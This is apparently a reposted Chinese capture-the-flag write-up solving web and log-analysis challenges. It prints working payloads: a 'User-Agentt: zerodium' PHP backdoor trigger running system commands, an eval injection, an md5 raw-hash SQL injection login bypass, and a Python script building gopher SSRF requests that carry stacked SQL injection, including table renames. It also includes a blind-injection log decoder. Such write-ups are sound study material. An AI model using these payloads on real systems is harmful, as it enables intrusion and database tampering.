Web
签到
http://cn-sec.com/archives/313267.html
User-Agentt: zerodiumsystem("cat /flag");
unsetme
这题先放着
/?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27);
“慢慢做”管理系统
根据题目提示,这里第一步登录应该利用一些字符串被md5($string,true)
之后会形成如下,从而造成注入
PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('ffifdyop',true));"
Command line code:1:
string(16) "'or'6�]��!r,��b"
PS C:\Users\Administrator\Downloads>
但是遗憾的是这里的ffifdyop
,被过滤了
所以我们需要寻找另一个能和ffifdyop
达到同样效果的字符,搜索引擎找一找
https://blog.csdn.net/March97/article/details/81222922
PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('129581926211651571912466741651878684928',true));"
Command line code:1:
string(16) "�T0D��o#��'or'8"
PS C:\Users\Administrator\Downloads>
/?username=admin&password=129581926211651571912466741651878684928
成功登录
根据题目的提示,直接在内网找一下admin.php
/ssrf.php?way=127.0.0.1%2Fadmin.php
抓一下这个后台管理系统的包,然后整理一下这个127.0.0.1/admin.php
的包,通过gopher
协议发送POST数据过去看一下,用python简单处理下
from urllib.parse import quote
payload = "username=mochu7&password=mochu7"
postdata = """
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: {}
{}
""".format(len(payload),payload)
final_payload = 'gopher://127.0.0.1:80/_'+ quote(quote(postdata))
print(final_payload)
print(postdata)
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252031%250A%250Ausername%253Dmochu7%2526password%253Dmochu7%250A
成功发送,接下来测试一下注入,加个单引号看看
username=mochu7'&password=mochu7
直接报错了
很明显这是注入,不过经过后面的fuzz测试发现这里存在,而且这个回显我看着就非常眼熟
username=mochu7';show databases#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252048%250A%250Ausername%253Dmochu7%2527%253Bshow%2520databases%2523%2526password%253Dmochu7%250A
Databases:
ctf
ctf2
information_schema
接着查
username=mochu7';use ctf;show tables#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252053%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf%253Bshow%2520tables%2523%2526password%253Dmochu7%250A
username=mochu7';use ctf2;show tables#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252054%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520tables%2523%2526password%253Dmochu7%250A
Tables_in_ctf:
users
Tables_in_ctf2:
fake_admin
real_admin_here_do_you_find
我们想要找的是真正的admin密码
username=mochu7';use ctf2;show columns from `fake_admin`#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252073%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560fake_admin%2560%2523%2526password%253Dmochu7%250A
username=mochu7';use ctf2;show columns from `real_admin_here_do_you_find`#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252090%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560real_admin_here_do_you_find%2560%2523%2526password%253Dmochu7%250A
本来应该继续查字段内容得到real_admin_here_do_you_find
表中的password
字段内容,但是这里过滤select
、handler
等,比赛的时候也就没去研究怎么查询到字段数据了,因为这题很明显像之前强网杯那题,我对那题有印象记得当时有一个通过修改想要查询的表的表名(real_admin_here_do_you_find
)为当前使用的表(fake_admin
),然后构造一下注入得到当前表的数据的做法
username=mochu7';rename table fake_admin to mochu7;rename table real_admin_here_do_you_find to fake_admin#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%2520122%250A%250Ausername%253Dmochu7%2527%253Brename%2520table%2520fake_admin%2520to%2520mochu7%253Brename%2520table%2520real_admin_here_do_you_find%2520to%2520fake_admin%2523%2526password%253Dmochu7%250A
username=mochu7'or 1=1;show tables;#&password=mochu7
得到真正的admin密码:5fb4e07de914cfc82afb44vbaf402203
最后传入真正的admin账户名和密码
username=admin&password=5fb4e07de914cfc82afb44vbaf402203
提示我们访问/flag.php
,并且查看源码拿着cookie去
Misc
你会日志分析吗
时间盲注日志分析
发现每一位中的这些测试包,都有一个包长度与其他的不一样,那这一位应该就是正确的flag,直接用Python简单处理下
from base64 import *
flag = ''
with open('access.log','r') as f:
lines = f.readlines()
for line in lines:
if "select%20flag%20from%20flllag" in line:
packet_len = line[line.find(' 200 ')+5:line.find(' "-" "python-requests/2.21.0"')]
if packet_len == '377':
ascii_code = line[line.find('))=')+3:line.find(',sleep')]
ascii_str = chr(int(ascii_code))
flag += ascii_str
else:
pass
else:
pass
print(b64decode(flag).decode('utf-8'))
flag{You_are_so_great}
sectraffic
转载:https://blog.csdn.net/mochu7777777/article/details/115422328